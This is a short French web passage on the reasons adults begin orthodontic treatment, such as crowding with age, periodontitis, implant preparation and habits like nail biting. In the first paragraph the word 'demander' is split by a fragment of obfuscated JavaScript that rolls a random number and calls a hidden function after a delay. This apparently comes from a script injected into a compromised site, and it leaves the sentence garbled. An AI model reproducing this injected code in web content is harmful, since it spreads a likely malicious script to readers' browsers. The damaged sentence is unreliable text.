Les motivations pour commencer un traitement une fois adulte peuvent être multiples. Bien que le besoin d’un appareil dentaire ne se soit pas fait sentir à l’âge adolescent, la position des dents peut évoluer avec l’âge ou les maladies dentaires, et demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander un traitement plus tard. Voici quelques exemples de motivations ou nécessités d’entreprendre un traitement orthodontique une fois adulte :
- Avec l’âge, les dents peuvent se chevaucher : il s’agit ici d’un phénomène courant du vieillissement. Le problème est alors essentiellement esthétique, mais peut également gêner le brossage.
- Une parodontite peut provoquer des déplacements dentaires : une fois guérie, le traitement d’orthodontie permettra de consolider le positionnement des dents.
- Des problèmes fonctionnels ou d’articulation peuvent provoquer de dégâts et compliquer la bonne occlusion dentaire.
- Avant la pose d’une prothèse ou d’un implant, il est parfois nécessaire de refaire une place adéquate avec un traitement d’orthodontie.
- De mauvaises habitudes quotidiennes peuvent impliquer un déplacement dentaire, telles que le mordillage d’un stylo, le fait de ronger ses ongles, et peuvent ruiner le travail d’un appareil dentaire porté à l’adolescence.
